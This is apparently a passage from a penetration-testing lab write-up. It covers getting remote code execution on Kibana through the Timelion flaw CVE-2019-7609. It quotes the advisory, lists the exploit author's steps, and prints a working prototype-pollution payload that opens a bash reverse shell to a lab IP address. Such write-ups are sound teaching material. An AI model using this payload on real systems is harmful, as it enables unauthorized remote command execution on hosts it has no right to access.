Exploitation

This machine has taught me to not rely fully on searchsploit since there will be times that exploits will not come up. So we just google.

GitHub - mpgn/CVE-2019-7609: RCE on Kibana versions before 5.6.15 and 6.6.0 in the Timelion visualizerGitHub

Looking it up lead me here, this website said the following:

Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.

Which is good because now this means that we could execue commands and get a reverse shell.

Exploit

1. Open Kibana

2. Past one of the following payload into the Timelion visualizer

3. Click run

4. On the left panel click on Canvas

5. Your reverse shell should pop ! :)

These are the exact instructions from the author.

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/192.168.49.242/5601 0>&1\'");//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

I also had to cycle through open ports.